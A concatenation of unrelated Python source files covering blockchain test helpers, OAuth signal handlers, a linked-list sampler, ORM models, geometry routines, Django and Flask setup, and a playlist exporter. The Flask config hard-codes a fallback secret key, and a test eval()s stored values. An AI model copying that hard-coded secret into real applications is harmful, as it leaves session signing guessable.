		# Record submission results on the task and persist it.
		self.__task.data.setdefault('backend_job_ids', {})
		backend_job_ids = result.get('backend_job_ids', {})
		backend_task_id = result.get('backend_task_id', 0)
		self.__task.data['backend_job_ids'].update(backend_job_ids)
		self.__task.data['backend_task_id'] = backend_task_id
		self.__task.data['status'] = 'Submitted'
		task_pool = self.__manager.load_task_pool()
		task_pool.save(self.__task)

		self.__logger.debug(result)


import os
from typing import List, Tuple

from raiden.network.blockchain_service import BlockChainService
from raiden.network.pathfinding import get_random_service
from raiden.network.proxies.service_registry import ServiceRegistry
from raiden.network.rpc.client import JSONRPCClient
from raiden.network.rpc.smartcontract_proxy import ContractProxy
from raiden.utils import typing
from raiden.utils.smart_contracts import deploy_contract_web3
from raiden.utils.solc import compile_files_cwd
from raiden_contracts.constants import CONTRACT_HUMAN_STANDARD_TOKEN
from raiden_contracts.contract_manager import ContractManager


def deploy_token(
    deploy_client: JSONRPCClient,
    contract_manager: ContractManager,
    initial_amount: typing.TokenAmount,
    decimals: int,
    token_name: str,
    token_symbol: str,
) -> ContractProxy:
    """Deploy a HumanStandardToken contract and return a proxy bound to it."""
    constructor_args = (initial_amount, decimals, token_name, token_symbol)
    token_address = deploy_contract_web3(
        contract_name=CONTRACT_HUMAN_STANDARD_TOKEN,
        deploy_client=deploy_client,
        contract_manager=contract_manager,
        constructor_arguments=constructor_args,
    )

    abi = contract_manager.get_contract_abi(CONTRACT_HUMAN_STANDARD_TOKEN)
    proxy = deploy_client.new_contract_proxy(
        contract_interface=abi, contract_address=token_address
    )
    return proxy


def deploy_tokens_and_fund_accounts(
    token_amount: int,
    number_of_tokens: int,
    deploy_service: BlockChainService,
    participants: typing.List[typing.Address],
    contract_manager: ContractManager,
) -> typing.List[typing.TokenAddress]:
    """ Deploy `number_of_tokens` ERC20 token instances with `token_amount` minted and
    distributed among `blockchain_services`. Optionally the instances will be registered with
    the raiden registry.

    Args:
        token_amount (int): number of units that will be created per token
        number_of_tokens (int): number of token instances that will be created
        deploy_service (BlockChainService): the blockchain connection that will deploy
        participants (list(address)): participant addresses that will receive tokens
        contract_manager (ContractManager): manager providing the compiled token contract

    Returns:
        list(address): the addresses of the deployed token contracts
    """
    token_addresses = []
    for _ in range(number_of_tokens):
        token_address = deploy_contract_web3(
            CONTRACT_HUMAN_STANDARD_TOKEN,
            deploy_service.client,
            contract_manager=contract_manager,
            constructor_arguments=(token_amount, 2, "raiden", "Rd"),
        )

        token_addresses.append(token_address)

        # only the creator of the token starts with a balance (deploy_service),
        # transfer from the creator to the other nodes (integer division
        # truncates; any remainder stays with the creator)
        for transfer_to in participants:
            deploy_service.token(token_address).transfer(
                to_address=transfer_to, amount=token_amount // len(participants)
            )

    return token_addresses


def deploy_service_registry_and_set_urls(
    private_keys, web3, contract_manager, service_registry_address
) -> Tuple[ServiceRegistry, List[str]]:
    """Create three ServiceRegistry proxies, register one URL per service and
    return the first proxy together with the registered URLs."""
    urls = ["http://foo", "http://boo", "http://coo"]

    proxies = []
    for privkey in private_keys[:3]:
        client = JSONRPCClient(web3, privkey)
        proxies.append(
            ServiceRegistry(
                jsonrpc_client=client,
                service_registry_address=service_registry_address,
                contract_manager=contract_manager,
            )
        )

    # Test that getting a random service for an empty registry returns None
    pfs_address = get_random_service(proxies[0], "latest")
    assert pfs_address is None

    # Test that setting the urls works
    for proxy, url in zip(proxies, urls):
        proxy.set_url(url)

    return proxies[0], urls


def get_test_contract(name):
    """Return the absolute path of the named test contract and its compiled
    artifacts."""
    contracts_dir = os.path.join(os.path.dirname(__file__), "..", "smart_contracts")
    contract_path = os.path.abspath(os.path.join(contracts_dir, name))
    compiled = compile_files_cwd([contract_path])

    return contract_path, compiled


def deploy_rpc_test_contract(deploy_client, name):
    """Compile `<name>.sol` from the test-contracts directory, deploy it and
    return the contract proxy."""
    source_path, compiled_contracts = get_test_contract(f"{name}.sol")
    proxy, _ = deploy_client.deploy_solidity_contract(
        name,
        compiled_contracts,
        libraries=dict(),
        constructor_parameters=None,
        contract_path=source_path,
    )
    return proxy


def get_list_of_block_numbers(item):
    """ Creates a list of block numbers of the given list/single event"""
    if isinstance(item, dict):
        # A single event maps to a one-element list.
        return [item["blockNumber"]]

    if isinstance(item, list):
        return [event["blockNumber"] for event in item]

    # Anything else yields no block numbers.
    return list()

# This file is part of Indico.
# Copyright (C) 2002 - 2022 CERN
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see the
# LICENSE file for more details.

import os

from indico.core import signals
from indico.core.db import db

from .logger import logger
from .oauth2 import require_oauth


__all__ = ['require_oauth']


@signals.core.app_created.connect
def _no_ssl_required_on_debug(app, **kwargs):
    """Allow OAuth over plain HTTP for debug/testing app instances."""
    if not (app.debug or app.testing):
        return
    os.environ['AUTHLIB_INSECURE_TRANSPORT'] = '1'


@signals.users.merged.connect
def _delete_merged_user_tokens(target, source, **kwargs):
    """On user merge, move the source user's OAuth app links to the target,
    folding them into the target's existing links where one exists."""
    links_by_app = {link.application: link for link in target.oauth_app_links}
    for link in source.oauth_app_links.all():
        existing = links_by_app.get(link.application)
        if existing is None:
            # Target has no link for this application yet; just reassign.
            logger.info('merge: reassigning %r to %r', link, target)
            link.user = target
        else:
            # Fold scopes and tokens into the target's link, drop the source's.
            logger.info('merge: merging %r into %r', link, existing)
            existing.update_scopes(set(link.scopes))
            existing.tokens.extend(link.tokens)
            db.session.delete(link)

import random
# Definition for singly-linked list.
# class ListNode(object):
#     def __init__(self, x):
#         self.val = x
#         self.next = None


class Solution(object):
    """Uniform random sampler over a singly-linked list.

    For long lists (more than _largesize links) two anchor nodes at roughly
    1/3 and 2/3 of the list are precomputed so getRandom never walks more
    than about a third of the list.
    """
    _largesize = 300

    def __init__(self, head):
        self.head = head
        # lsize counts the links, i.e. number of nodes minus one.
        self.lsize = 0
        while head.next:
            head = head.next
            self.lsize += 1

        self.m1_idx = None
        self.m2_idx = None
        if self.lsize > self._largesize:
            # Floor division keeps indices integral (also on Python 3,
            # where `/` would yield a float).
            self.m1_idx = self.lsize // 3  # start from 1/3
            # BUGFIX: _getN is 1-based, so _getN(m1_idx) returned the node at
            # 0-based index m1_idx - 1.  That skewed sampling (two nodes were
            # double-weighted and the last node was never returned).  Anchor
            # at 0-based index m1_idx instead so anchors line up with nextpos.
            self.m1 = self._getN(self.m1_idx + 1)
            self.m2_idx = self.m1_idx * 2  # start from 2/3
            self.m2 = self._getN(self.m2_idx + 1)

    def _getN(self, n):
        """Return the n-th node (1-based) counting from the head."""
        n -= 1
        p = self.head
        while n:
            p = p.next
            n -= 1
        return p

    def getRandom(self):
        """Return the value of a uniformly chosen node."""
        def _get(delta, start):
            # Walk `delta` links forward from `start` and return its value.
            p = start
            while delta:
                p = p.next
                delta -= 1
            return p.val

        # randint is inclusive: 0..lsize addresses every node exactly once.
        nextpos = random.randint(0, self.lsize)
        if not self.m1_idx:
            return _get(nextpos, self.head)

        # Start from the nearest precomputed anchor at or below nextpos.
        if nextpos < self.m1_idx:
            val = _get(nextpos, self.head)
        elif nextpos < self.m2_idx:
            val = _get(nextpos - self.m1_idx, self.m1)
        else:
            val = _get(nextpos - self.m2_idx, self.m2)
        return val

#!/usr/bin/python
# -*- coding: utf-8 -*-
import unittest
import os
from misura.canon import option
from misura.canon.option import get_typed_cols, get_insert_cmd, base_col_def, print_tree
import sqlite3
from misura.canon.tests import testdir

# Scratch sqlite database path used by these tests (recreated in setUpClass).
db = testdir + 'storage/tmpdb'
# Sample configuration CSV merged into the stores under test.
c1 = testdir + 'storage/Conf.csv'


def go(t):
    """Build and validate an Option whose handle and type are both `t`."""
    opt = option.Option(handle=t, type=t)
    opt.validate()
    return opt


class SqlStore(unittest.TestCase):
    """Round-trip tests for option.SqlStore against a scratch sqlite db."""

    @classmethod
    def setUpClass(cls):
        # Start from a clean database file each run.
        if os.path.exists(db):
            os.remove(db)
        cls.conn = sqlite3.connect(db, detect_types=sqlite3.PARSE_DECLTYPES)
        # Build a reference description tree from the sample CSV.
        st0 = option.CsvStore(kid='/base/')
        st0.merge_file(c1)
        st0.validate()
        cls.desc = st0.desc

    def test_get_typed_cols(self):
        # Smoke-test column typing for each option type (output inspected manually).
        print(get_typed_cols(go('Integer')))
        print(get_typed_cols(go('String')))
        print(get_typed_cols(go('Point')))
        print(get_typed_cols(go('Role')))
        print(get_typed_cols(go('RoleIO')))
        print(get_typed_cols(go('Log')))
        print(get_typed_cols(go('Meta')))

    def test_get_insert_cmd(self):
        # Smoke-test INSERT command generation for each option type.
        print(get_insert_cmd(go('Integer'), base_col_def))
        print(get_insert_cmd(go('String'), base_col_def))
        print(get_insert_cmd(go('Point'), base_col_def))
        print(get_insert_cmd(go('Role'), base_col_def))
        print(get_insert_cmd(go('RoleIO'), base_col_def))
        print(get_insert_cmd(go('Log'), base_col_def))
        print(get_insert_cmd(go('Meta'), base_col_def))

    def test_column_definition(self):
        # Smoke-test per-type column definitions.
        s = option.SqlStore()
        print(s.column_definition(go('Integer'))[1])
        print(s.column_definition(go('String'))[1])
        print(s.column_definition(go('Point'))[1])
        print(s.column_definition(go('Role'))[1])
        print(s.column_definition(go('RoleIO'))[1])
        print(s.column_definition(go('Log'))[1])
        print(s.column_definition(go('Meta'))[1])

    def test_write_desc(self):
        # Write the reference desc, read it back, then write/read again to
        # check the round trip is stable (output inspected manually).
        s = option.SqlStore()
        s.cursor = self.conn.cursor()
        s.write_desc(self.desc)
        print('READING')
        r = s.read_tree()
        print(r)
        print('print(tree\n', print_tree(r))
        print('WRITING AGAIN')
        s.write_tree(r)
        print("READING AGAIN")
        r = s.read_tree()
        print(r)
        print('print(tree2\n', print_tree(r))


#	@unittest.skip('')
    def test_tables(self):
        # Write a table from a CsvStore-derived desc and verify the set of
        # handles survives the sqlite round trip.
        st0 = option.CsvStore(kid='ciao')
        st0.merge_file(c1)
        st = option.SqlStore(kid='ciao')
        st.desc = st0.desc
        k0 = set(st.desc.keys())
        cursor = self.conn.cursor()
        st.write_table(cursor, 'conf1')
        self.conn.commit()
        cursor.execute('select handle from conf1')
        r = cursor.fetchall()
        # NOTE(review): handles are stored repr()'d, hence the eval() here --
        # confirm this matches SqlStore.write_table's encoding.
        k1 = set([eval(k[0]) for k in r])
        self.assertEqual(k0, k1)

        # Reading the table into a fresh store must reproduce the same desc.
        st2 = option.SqlStore(kid='ciao')
        st2.read_table(cursor, 'conf1')
        self.assertEqual(st.desc, st2.desc)


# Run the suite when this module is executed directly.
if __name__ == "__main__":
    unittest.main()

from players.player import player
from auxiliar.aux_plot import *

import random
from collections import deque

import sys
sys.path.append('..')
import tensorblock as tb
import numpy as np

import tensorflow as tf


# PLAYER REINFORCE RNN
class player_reinforce_rnn_2(player):

    # __INIT__
    def __init__(self):

        player.__init__(self)
        self.experiences = deque()

    # CHOOSE NEXT ACTION
    def act(self, state):

        return self.calculate(state)

    # CALCULATE NETWORK
    def calculate(self, state):

        size = len( self.experiences )

        if size < self.NUM_FRAMES:
            return self.create_random_action()

        states = np.zeros( (self.NUM_FRAMES , self.obsv_shape[0], self.obsv_shape[1] ) )

        for i , j in enumerate( range( size - self.NUM_FRAMES , size  ) ):
            states[i] = self.experiences[j][1]

        states = np.expand_dims( states, 0 )
        output = np.squeeze( self.brain.run('Output', [['Observation', states]]) )
        action = np.random.choice( np.arange(len(output)), p=output )

        return self.create_action(action)

    # PREPARE NETWORK
    def operations(self):

        # Action Placeholders

        self.brain.addInput( shape = [ None , self.num_actions ] , name = 'Actions' )
        self.brain.addInput( shape = [ None                    ] , name = 'Target'  )


        # Operations

        self.brain.addOperation( function = tb.ops.pgcost,
                                 input    = [ 'Output', 'Actions', 'Target' ],
                                 name     = 'Cost' )

        # Optimizer

        self.brain.addOperation( function      = tb.optims.adam,
                                 input         = 'Cost',
                                 learning_rate = self.LEARNING_RATE,
                                 name          = 'Optimizer' )

        # TensorBoard

        self.brain.addSummaryScalar( input = 'Cost' )
        self.brain.addSummaryHistogram( input = 'Target' )
        self.brain.addWriter( name = 'Writer' , dir = './' )
        self.brain.addSummary( name = 'Summary' )
        self.brain.initialize()

    # TRAIN NETWORK
    def train(self, prev_state, curr_state, actn, rewd, done, episode):

        # Store New Experience Until Done

        self.experiences.append((prev_state, curr_state, actn, rewd, done))

        batchsize = len( self.experiences ) - self.NUM_FRAMES + 1

        # Check for Train

        if done:

            # Select Batch

            batch = self.experiences

            # Separate Batch Data

            prev_states = np.zeros( ( batchsize , self.NUM_FRAMES , self.obsv_shape[0], self.obsv_shape[1] ) )
            curr_states = np.zeros( ( batchsize , self.NUM_FRAMES , self.obsv_shape[0], self.obsv_shape[1] ) )
            actions     = np.zeros( ( batchsize , self.num_actions ) )
            rewards     = np.zeros( ( batchsize ) )
            dones       = np.zeros( ( batchsize ) )

            # Select Batches

            for i in range( 0 , batchsize ):

                for j in range( 0 , self.NUM_FRAMES ):

                    prev_states[i,j,:,:] = self.experiences[ i + j ][0]
                    curr_states[i,j,:,:] = self.experiences[ i + j ][1]

                actions[i] = self.experiences[ i + self.NUM_FRAMES  - 1][2]
                rewards[i] = self.experiences[ i + self.NUM_FRAMES  - 1][3]
                dones[i]   = self.experiences[ i + self.NUM_FRAMES  - 1][4]

            # Calculate Discounted Reward

            running_add = 0
            discounted_r = np.zeros_like(rewards)
            for t in reversed(range(0, len(rewards))):
                if rewards[t] != 0:  # pygame_catch specific
                    running_add = 0
                running_add = running_add * self.REWARD_DISCOUNT + rewards[t]
                discounted_r[t] = running_add

            # Optimize Neural Network

            _, summary = self.brain.run( ['Optimizer','Summary'], [ ['Observation', prev_states ],
                                                                    ['Actions',  actions        ],
                                                                    ['Target', discounted_r     ] ] )

            # TensorBoard

            self.brain.write( summary = summary, iter = episode )

            # Reset Batch

            self.experiences = deque()

from SBaaS_base.postgresql_orm_base import *

class data_stage01_rnasequencing_analysis(Base):
    """SQLAlchemy ORM model describing an RNA-sequencing analysis grouping
    (stage01): which samples belong to an analysis, at which time point,
    and what kind of analysis it is."""
    __tablename__ = 'data_stage01_rnasequencing_analysis'
    id = Column(Integer, Sequence('data_stage01_rnasequencing_analysis_id_seq'), primary_key=True)
    analysis_id = Column(String(500))
    experiment_id = Column(String(50))
    sample_name_abbreviation = Column(String(500)) # equivalent to sample_name_abbreviation
    sample_name = Column(String(500)) # equivalent to sample_name_abbreviation
    time_point = Column(String(10)) # converted to intermediate in lineage analysis
    analysis_type = Column(String(100)); # time-course (i.e., multiple time points), paired (i.e., control compared to multiple replicates), group (i.e., single grouping of samples).
    used_ = Column(Boolean);
    comment_ = Column(Text);

    # One row per unique sample/time-point/type combination within an analysis.
    __table_args__ = (
            UniqueConstraint('experiment_id','sample_name_abbreviation','sample_name','time_point','analysis_type','analysis_id'),
            )
    def __init__(self, 
                row_dict_I,
                ):
        # Populate all mapped columns from a dict keyed by column name.
        self.analysis_id=row_dict_I['analysis_id'];
        self.experiment_id=row_dict_I['experiment_id'];
        self.sample_name_abbreviation=row_dict_I['sample_name_abbreviation'];
        self.sample_name=row_dict_I['sample_name'];
        self.time_point=row_dict_I['time_point'];
        self.analysis_type=row_dict_I['analysis_type'];
        self.used_=row_dict_I['used_'];
        self.comment_=row_dict_I['comment_'];

    def __set__row__(self,analysis_id_I,
                 experiment_id_I,
            sample_name_abbreviation_I,
            sample_name_I,
            time_point_I,
            analysis_type_I,
            used__I,
            comment__I):
        # Positional setter mirroring __init__ (legacy interface).
        self.analysis_id=analysis_id_I
        self.experiment_id=experiment_id_I
        self.sample_name_abbreviation=sample_name_abbreviation_I
        self.sample_name=sample_name_I
        self.time_point=time_point_I
        self.analysis_type=analysis_type_I
        self.used_=used__I
        self.comment_=comment__I

    def __repr__dict__(self):
        # Plain-dict representation of the row (includes the db-assigned id).
        return {'id':self.id,
                'analysis_id':self.analysis_id,
            'experiment_id':self.experiment_id,
            'sample_name_abbreviation':self.sample_name_abbreviation,
            'sample_name':self.sample_name,
            'time_point':self.time_point,
            'analysis_type':self.analysis_type,
            'used_':self.used_,
            'comment_':self.comment_}
    
    def __repr__json__(self):
        # NOTE(review): `json` is not imported in this chunk; presumably it
        # comes from the star import of postgresql_orm_base -- confirm.
        return json.dumps(self.__repr__dict__())
#!/usr/bin/python
# -*- coding: utf-8 -*-
# pylint: disable=invalid-name
from __future__ import absolute_import
from math import acos, cos, pi, radians, sin, sqrt
import auttitude as at
import numpy as np


def normalized_cross(a, b):
    """
    Return the cross product of the two vectors, scaled to unit length.

    When the cross product is the zero vector (parallel inputs) it is
    returned as-is to avoid a division by zero.

    Parameters:
        a: First vector.
        b: Second vector.
    """
    cross = np.cross(a, b)
    norm = sqrt(cross.dot(cross))
    if norm > 0:
        return cross / norm
    return cross


def general_plane_intersection(n_a, da, n_b, db):
    """
    Return a (direction, point) pair describing the line where two planes
    intersect, or None when the planes are parallel.

    Each plane is given by its normal vector and its scalar offset, i.e.
    the plane n . x = d.

    Parameters:
        n_a: Normal vector to plane A
         da: Offset of plane A
        n_b: Normal vector to plane B
         db: Offset of plane B
    """
    # https://en.wikipedia.org/wiki/Intersection_curve
    n_a = np.array(n_a)
    n_b = np.array(n_b)
    da = np.array(da)
    db = np.array(db)

    direction = np.cross(n_a, n_b)
    norm = sqrt(np.dot(direction, direction))
    if norm == 0:
        # Parallel (or identical) planes never meet in a single line.
        return None
    direction /= norm
    aa = np.dot(n_a, n_a)
    bb = np.dot(n_b, n_b)
    ab = np.dot(n_a, n_b)
    denom = 1. / (aa * bb - ab * ab)
    point = ((da * bb - db * ab) * denom * n_a
             + (db * aa - da * ab) * denom * n_b)
    return direction, point


def small_circle_intersection(axis_a, angle_a, axis_b, angle_b):
    """
    Finds the intersection between two small-circles returning zero, one
    (tangent circles) or two unit-sphere points as a tuple.

    Each small circle is the set of unit vectors at the given angular
    aperture from its axis, i.e. the section of the sphere by the plane
    axis . x = cos(angle).

    Parameters:
         axis_a: Vector defining first circle axis
        angle_a: Small circle aperture angle (in radians) around axis_a
         axis_b: Vector defining second circle axis
        angle_b: Small circle aperture angle (in radians) around axis_b
    """
    line = general_plane_intersection(axis_a, cos(angle_a),
                                      axis_b, cos(angle_b))
    if line is None:
        # Parallel planes: the circles do not intersect.
        return ()
    l_v, l_0 = line
    # Intersect the line l_0 + t*l_v with the unit sphere.  l_v is a unit
    # vector, so the quadratic in t has leading coefficient 1.
    # https://en.wikipedia.org/wiki/Line%E2%80%93sphere_intersection
    b = 2*l_v.dot(l_0)
    delta = b*b - 4*(l_0.dot(l_0) - 1)
    # The solutions lie on the unit sphere analytically; they are not
    # re-normalized here, so tiny floating-point drift is possible.
    if delta < 0:
        return ()
    elif delta == 0:
        # Tangent circles touch at a single point.  Bug fix: previously
        # this returned the bare line parameter -b/2. instead of the
        # actual point on the sphere.
        return (l_0 + l_v*(-b/2.),)
    else:
        sqrt_delta = sqrt(delta)
        return l_0 + l_v*(-b - sqrt_delta)/2., l_0 + l_v*(-b + sqrt_delta)/2.


def build_rotation_matrix(azim, plng, rake):
    """
    Return the rotation matrix that carries the North vector onto the
    line given by azimuth and plunge, with the East and Up vectors
    rotated clockwise by rake about that line.

    Parameters:
        azim: Line Azimuth from North (degrees).
        plng: Line Plunge measured from horizontal (degrees).
        rake: Rotation angle around rotated axis (degrees).
    """
    azim, plng, rake = radians(azim), radians(plng), radians(rake)

    # Rake component.
    rake_rot = np.array(((cos(rake), 0., sin(rake)),
                         (0., 1., 0.),
                         (-sin(rake), 0., cos(rake))))
    # Plunge component.
    plng_rot = np.array(((1., 0., 0.),
                         (0., cos(plng), sin(plng)),
                         (0., -sin(plng), cos(plng))))
    # Azimuth component.
    azim_rot = np.array(((cos(azim), sin(azim), 0.),
                         (-sin(azim), cos(azim), 0.),
                         (0., 0., 1.)))

    # Same composition order as R3.R2.R1 in the original formulation.
    return azim_rot.dot(plng_rot).dot(rake_rot)


def adjust_lines_to_planes(lines, planes):
    """
    Project each given line to its respective plane. Returns the projected
    (re-normalized) lines as a new LineSet and the angle (in radians)
    between each line and plane prior to projection.

    Parameters:
        lines:  A LineSet like object with an array of n Lines
        planes: A PlaneSet like object with an array of n Planes
    """

    lines = at.LineSet(lines)
    planes = at.PlaneSet(planes)

    angles = np.zeros(len(lines))
    adjusted_lines = np.zeros_like(lines)
    for i, (line, plane) in enumerate(zip(lines, planes)):
        # `plane` acts as the plane's pole (normal); assumes it is a unit
        # vector — TODO confirm against PlaneSet.
        cos_theta = np.dot(line, plane)
        angles[i] = pi/2. - acos(cos_theta)
        # Remove the component of the line along the plane normal.  Bug
        # fix: the previous code subtracted line*cos_theta, which merely
        # rescales the line, so after normalization the direction was
        # unchanged and nothing was actually projected.
        adjusted_line = line - plane*cos_theta
        adjusted_lines[i] = adjusted_line/sqrt(np.dot(adjusted_line,
                                                      adjusted_line))
    return adjusted_lines, angles

from django.contrib import admin

# Register your models here.
from rcps.models import *


class IngredientToRecipeInline(admin.TabularInline):
    # Inline editor for the Ingredient <-> Recipe many-to-many through table.
    model = Ingredient.recipes.through
    verbose_name = 'Ингредиент'  # "Ingredient"
    verbose_name_plural = 'Ингредиенты'  # "Ingredients"


class EquipmentInline(admin.TabularInline):
    # Inline editor for the Equipment <-> Recipe many-to-many through table.
    model = Equipment.equipment_recipes.through
    verbose_name = 'Инструмент'  # "Tool"
    verbose_name_plural = 'Инструменты'  # "Tools"


class TagInline(admin.TabularInline):
    # Inline editor for the Tag <-> Recipe many-to-many through table.
    model = Tag.tag_recipes.through
    verbose_name = 'Тег'  # "Tag"
    verbose_name_plural = 'Теги'  # "Tags"


class RecipeAdmin(admin.ModelAdmin):
    # Only the scalar fields are edited directly; the related ingredients,
    # equipment and tags are managed through the inlines below.
    model = Recipe
    fields = ['recipe_name', 'recipe_link']
    inlines = (
        IngredientToRecipeInline,
        EquipmentInline,
        TagInline,
    )


class IngredientComponentInAlternativeInline(admin.TabularInline):
    # Inline editor for the IngredientAlternative <-> Ingredient through table.
    model = IngredientAlternative.ingredients.through
    verbose_name = 'Ингредиент'  # "Ingredient"
    verbose_name_plural = 'Ингредиенты'  # "Ingredients"


class IngredientAlternativeAdmin(admin.ModelAdmin):
    # Alternatives edit their member ingredients through the inline.
    model = IngredientAlternative
    inlines = (
        IngredientComponentInAlternativeInline,
    )


# Models with a customized admin are registered with their ModelAdmin class;
# the remaining models use Django's default admin.
admin.site.register(Recipe, RecipeAdmin)
admin.site.register(Ingredient)
admin.site.register(IngredientAlternative, IngredientAlternativeAdmin)
admin.site.register(IngredientCategory)
admin.site.register(Equipment)
admin.site.register(EquipmentCategory)
admin.site.register(IngredientReplacement)
admin.site.register(Tag)
import os

class Config(object):
    """Base Flask configuration shared by all environments."""
    DEBUG = False
    TESTING = False
    CSRF_ENABLED = True
    # NOTE(review): hard-coded fallback secret — only ProductionConfig
    # overrides it from the environment; make sure no Internet-facing
    # deployment runs with this value.
    SECRET_KEY = "super_secret_key"
    # Read at import time: raises KeyError immediately when DATABASE_URL
    # is not set (fails fast rather than at first query).
    SQLALCHEMY_DATABASE_URI = os.environ['DATABASE_URL']

class ProductionConfig(Config):
    """Production settings: the secret key must come from the environment."""
    DEBUG = False
    # Raises KeyError at import time when SECRET_KEY is unset.
    SECRET_KEY = os.environ['SECRET_KEY']

class DevelopmentConfig(Config):
    """Local development settings with debugging enabled."""
    DEVELOPMENT = True
    DEBUG = True

class TestingConfig(Config):
    """Settings used by the test suite."""
    TESTING = True

r"""
Create MapServer class diagrams

Requires https://graphviz.gitlab.io/_pages/Download/Download_windows.html
https://stackoverflow.com/questions/1494492/graphviz-how-to-go-from-dot-to-a-graph

For DOT languge see http://www.graphviz.org/doc/info/attrs.html

cd C:\Program Files (x86)\Graphviz2.38\bin
dot -Tpng D:\GitHub\mappyfile\mapfile_classes.dot -o outfile.png
outfile.png

For Entity Relationship diagrams:

https://graphviz.readthedocs.io/en/stable/examples.html#er-py

"""

import os
import pydot
# import pprint


FONT = "Lucida Sans"


def graphviz_setup(gviz_path):
    """Prepend *gviz_path* to PATH so the Graphviz binaries can be found.

    Uses ";" as the separator — this script targets Windows (see
    os.startfile in save_file).
    """
    os.environ['PATH'] = ";".join((gviz_path, os.environ['PATH']))


def add_child(graph, child_id, child_label, parent_id, colour):
    """Add a filled polygon node and an edge linking it to its parent.

    http://www.graphviz.org/doc/info/shapes.html#polygon
    """
    child = pydot.Node(child_id, style="filled", fillcolor=colour,
                       label=child_label, shape="polygon", fontname=FONT)
    graph.add_node(child)
    graph.add_edge(pydot.Edge(parent_id, child))


def add_children(graph, parent_id, d, level=0):
    """Recursively add one node per class in *d*, colour-coded by depth.

    The palette cycles blue/white/green and supports up to nine levels
    of nesting (deeper trees would raise IndexError, as before).
    """
    palette = ["#6b6bd1", "#fdfefd", "#33a333"] * 3  # blue, white, green
    fill = palette[level]

    for class_name, grandchildren in d.items():
        node_id = "{}_{}".format(parent_id, class_name)
        add_child(graph, node_id, class_name, parent_id, fill)
        add_children(graph, node_id, grandchildren, level + 1)


def save_file(graph, fn):
    """Write PNG and DOT renderings of *graph* and open the PNG (Windows)."""
    png_name = "{}.png".format(fn)
    graph.write_png(png_name)
    graph.write("{}.dot".format(fn))
    os.startfile(png_name)


def main(gviz_path, layer_only=False):
    """Build the MapServer class diagram and save it to disk.

    Parameters:
        gviz_path:  Folder containing the Graphviz executables.
        layer_only: When True, draw only the LAYER subtree.
    """
    graphviz_setup(gviz_path)
    graph = pydot.Dot(graph_type='digraph', rankdir="TB")

    # Child keyword hierarchy of the LAYER object.
    layer_children = {
        'CLASS': {
            'LABEL': {'STYLE': {}},
            'CONNECTIONOPTIONS': {},
            'LEADER': {'STYLE': {}},
            'STYLE': {},
            'VALIDATION': {}
        },
        'CLUSTER': {},
        'COMPOSITE': {},
        'FEATURE': {'POINTS': {}},
        'GRID': {},
        'JOIN': {},
        'METADATA': {},
        'PROJECTION': {},
        'SCALETOKEN': {'VALUES': {}},
        'VALIDATION': {}
    }

    # Full keyword hierarchy rooted at MAP.
    classes = {
        "MAP": {
            "LAYER": layer_children,
            'LEGEND': {'LABEL': {}},
            'PROJECTION': {},
            'QUERYMAP': {},
            'REFERENCE': {},
            'SCALEBAR': {'LABEL': {}},
            'SYMBOL': {},
            'WEB': {'METADATA': {}, 'VALIDATION': {}}
        }
    }

    if layer_only:
        root = "LAYER"
        classes = classes["MAP"]
        fn = "layer_classes"
    else:
        root, = classes.keys()  # the single top-level key, "MAP"
        fn = "map_classes"

    root_node = pydot.Node(root, style="filled", fillcolor="#33a333",
                           label=root, fontname=FONT, shape="polygon")
    graph.add_node(root_node)
    add_children(graph, root, classes[root])
    save_file(graph, fn)


if __name__ == "__main__":
    gviz_path = r"C:\Program Files (x86)\Graphviz2.38\bin"
    # Render the LAYER-only diagram first, then the full MAP diagram.
    for layer_only in (True, False):
        main(gviz_path, layer_only)
    print("Done!")

# Author: John Elkins <john.elkins@yahoo.com>
# License: MIT <LICENSE>

from common import *

# An output directory argument is mandatory.
if len(sys.argv) < 2:
    log('ERROR output directory is required')
    time.sleep(3)  # leave the message visible briefly before the console closes
    exit()

# setup the output directory, create it if needed
output_dir = sys.argv[1]
if not os.path.exists(output_dir):
    os.makedirs(output_dir)

# log in and load personal library
api = open_api()
library = load_personal_library()

def playlist_handler(playlist_name, playlist_description, playlist_tracks):
    """Export one playlist to <output_dir>/<name>.csv plus a matching .log.

    playlist_name:        display name, also used (slash-stripped) as the
                          output file stem; empty names are skipped.
    playlist_description: optional text written as a leading "comment" row.
    playlist_tracks:      playlist-entry dicts; each may embed a 'track'
                          dict or only reference one by 'trackId', in which
                          case the track is looked up in the library.
    """
    # skip empty and no-name playlists
    if not playlist_name: return
    if len(playlist_tracks) == 0: return

    # setup output files
    # strip path separators so the name is safe as a file stem
    playlist_name = playlist_name.replace('/', '')
    open_log(os.path.join(output_dir,playlist_name+u'.log'))
    outfile = codecs.open(os.path.join(output_dir,playlist_name+u'.csv'),
        encoding='utf-8',mode='w')

    # keep track of stats
    stats = create_stats()
    export_skipped = 0
    # keep track of songids incase we need to skip duplicates
    song_ids = []

    log('')
    log('============================================================')
    log(u'Exporting '+ unicode(len(playlist_tracks)) +u' tracks from '
        +playlist_name)
    log('============================================================')

    # add the playlist description as a "comment"
    if playlist_description:
        outfile.write(tsep)
        outfile.write(playlist_description)
        outfile.write(os.linesep)

    for tnum, pl_track in enumerate(playlist_tracks):
        track = pl_track.get('track')

        # we need to look up these track in the library
        if not track:
            # NOTE(review): `in` tests id membership within the trackId
            # string, i.e. a substring match — presumably ids are exact;
            # confirm against the API's id format.
            library_track = [
                item for item in library if item.get('id')
                in pl_track.get('trackId')]
            if len(library_track) == 0:
                # not found in the library either; log and skip it
                log(u'!! '+str(tnum+1)+repr(pl_track))
                export_skipped += 1
                continue
            track = library_track[0]

        result_details = create_result_details(track)

        # skip songs already exported unless duplicates are allowed
        if not allow_duplicates and result_details['songid'] in song_ids:
            log('{D} '+str(tnum+1)+'. '+create_details_string(result_details,True))
            export_skipped += 1
            continue

        # update the stats
        update_stats(track,stats)

        # export the track
        song_ids.append(result_details['songid'])
        outfile.write(create_details_string(result_details))
        outfile.write(os.linesep)

    # calculate the stats
    stats_results = calculate_stats_results(stats,len(playlist_tracks))

    # output the stats to the log
    log('')
    log_stats(stats_results)
    log(u'export skipped: '+unicode(export_skipped))

    # close the files
    close_log()
    outfile.close()

# the personal library is used so we can lookup tracks that fail to return
# info from the ...playlist_contents() call

playlist_contents = api.get_all_user_playlist_contents()

# export every user playlist
for playlist in playlist_contents:
    playlist_name = playlist.get('name')
    playlist_description = playlist.get('description')
    playlist_tracks = playlist.get('tracks')

    playlist_handler(playlist_name, playlist_description, playlist_tracks)

# optionally export the implicit "Thumbs up" playlist (flag presumably
# defined in common)
